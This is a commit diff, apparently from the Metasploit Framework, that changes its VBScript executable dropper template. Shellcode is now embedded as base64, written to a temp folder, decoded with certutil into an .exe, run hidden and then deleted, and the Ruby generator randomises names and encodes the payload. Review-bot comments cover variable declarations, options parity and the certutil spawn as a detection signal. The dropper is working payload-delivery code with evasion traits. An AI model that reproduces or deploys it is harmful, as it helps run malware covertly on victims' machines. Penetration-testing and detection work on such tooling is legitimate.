
Commit c8c5549

committed
Send base64ed shellcode and decode with certutil
1 parent 53ff305 commit c8c5549


2 files changed

+12
-9
lines changed

Lines changed: 9 additions & 8 deletions
@@ -1,26 +1,27 @@
11
Function %{var_func}()
2-
%{var_shellcode} = "%{hex_shellcode}"
2+
%{var_shellcode} = "%{base64_shellcode}"
33

44
Dim %{var_obj}
55
Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
66
Dim %{var_stream}
77
Dim %{var_tempdir}
8-
Dim %{var_tempexe}
8+
Dim %{var_tempbase64}
99
Dim %{var_basedir}
1010
Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
1111
%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
1212
%{var_obj}.CreateFolder(%{var_basedir})
13+
%{var_tempbase64} = %{var_basedir} & "\" & "%{base64_filename}"
1314
%{var_tempexe} = %{var_basedir} & "\" & "%{exe_filename}"
14-
Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe}, true , false)
15-
For i = 1 to Len(%{var_shellcode}) Step 2
16-
%{var_stream}.Write Chr(CLng("&H" & Mid(%{var_shellcode},i,2)))
17-
Next
15+
Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempbase64}, true , false)
16+
%{var_stream}.Write %{var_shellcode}
1817
%{var_stream}.Close
1918
Dim %{var_shell}
2019
Set %{var_shell} = CreateObject("Wscript.Shell")
20+
%{var_shell}.run "certutil -decode " & %{var_tempbase64} & " " & %{var_tempexe}, 0, true
2121
%{var_shell}.run %{var_tempexe}, 0, true
22-
%{var_obj}.DeleteFile(%{var_tempexe})
22+
%{var_obj}.DeleteFile(%{var_tempexe})
23+
%{var_obj}.DeleteFile(%{var_tempbase64})
2324
%{var_obj}.DeleteFolder(%{var_basedir})
2425
End Function
2526

26-
%{init}
27+
%{init}
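Review bot: The declaration `Dim %{var_tempexe}` at line 8 is replaced by `Dim %{var_tempbase64}` instead of being kept next to it, yet `%{var_tempexe}` is still assigned on new line 14 and used by the `certutil -decode` call, the second `run` call and the first `DeleteFile` call. It now works only as an implicitly declared variable and the template would fail under `Option Explicit`; keep both lines, `Dim %{var_tempexe}` and `Dim %{var_tempbase64}`. For anyone reading this template to write detections, the new line 20 means the script host spawns `certutil -decode` with both paths inside a freshly created temp subfolder before the decoded file is run.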

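--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -1243,6 +1243,7 @@ def self.to_exe_vbs(exes = '', opts = {})
 
 hash_sub = {}
 hash_sub[:exe_filename] = opts[:exe_filename] || Rex::Text.rand_text_alpha(rand(8)+8) << '.exe'
+hash_sub[:base64_filename] = Rex::Text.rand_text_alpha(rand(8)+8) << '.b64'
 hash_sub[:var_shellcode] = Rex::Text.rand_text_alpha(rand(8)+8)
 hash_sub[:var_fname] = Rex::Text.rand_text_alpha(rand(8)+8)
 hash_sub[:var_func] = Rex::Text.rand_text_alpha(rand(8)+8)
@@ -1251,9 +1252,10 @@ def self.to_exe_vbs(exes = '', opts = {})
 hash_sub[:var_shell] = Rex::Text.rand_text_alpha(rand(8)+8)
 hash_sub[:var_tempdir] = Rex::Text.rand_text_alpha(rand(8)+8)
 hash_sub[:var_tempexe] = Rex::Text.rand_text_alpha(rand(8)+8)
+hash_sub[:var_tempbase64] = Rex::Text.rand_text_alpha(rand(8)+8)
 hash_sub[:var_basedir] = Rex::Text.rand_text_alpha(rand(8)+8)
 
-hash_sub[:hex_shellcode] = exes.unpack('H*').join('')
+hash_sub[:base64_shellcode] = Rex::Text.encode_base64(exes)
 
 hash_sub[:init] = ""
 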
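Review bot: `hash_sub[:base64_filename]` on new line 1246 ignores `opts`, while the line directly above it honours `opts[:exe_filename]`; for parity it could read `hash_sub[:base64_filename] = opts[:base64_filename] || Rex::Text.rand_text_alpha(rand(8)+8) << '.b64'`. The switch on new line 1258 from an inline hex string to base64 also means the generated script now depends on `certutil` being available on the host, which nothing in the visible lines documents. A comment such as `# The generated VBS writes the payload as base64 and shells out to certutil -decode` above the `hash_sub` assignments would record that. to_exe_vbs begins and ends outside both hunks, so any existing doc comment on it is not visible here.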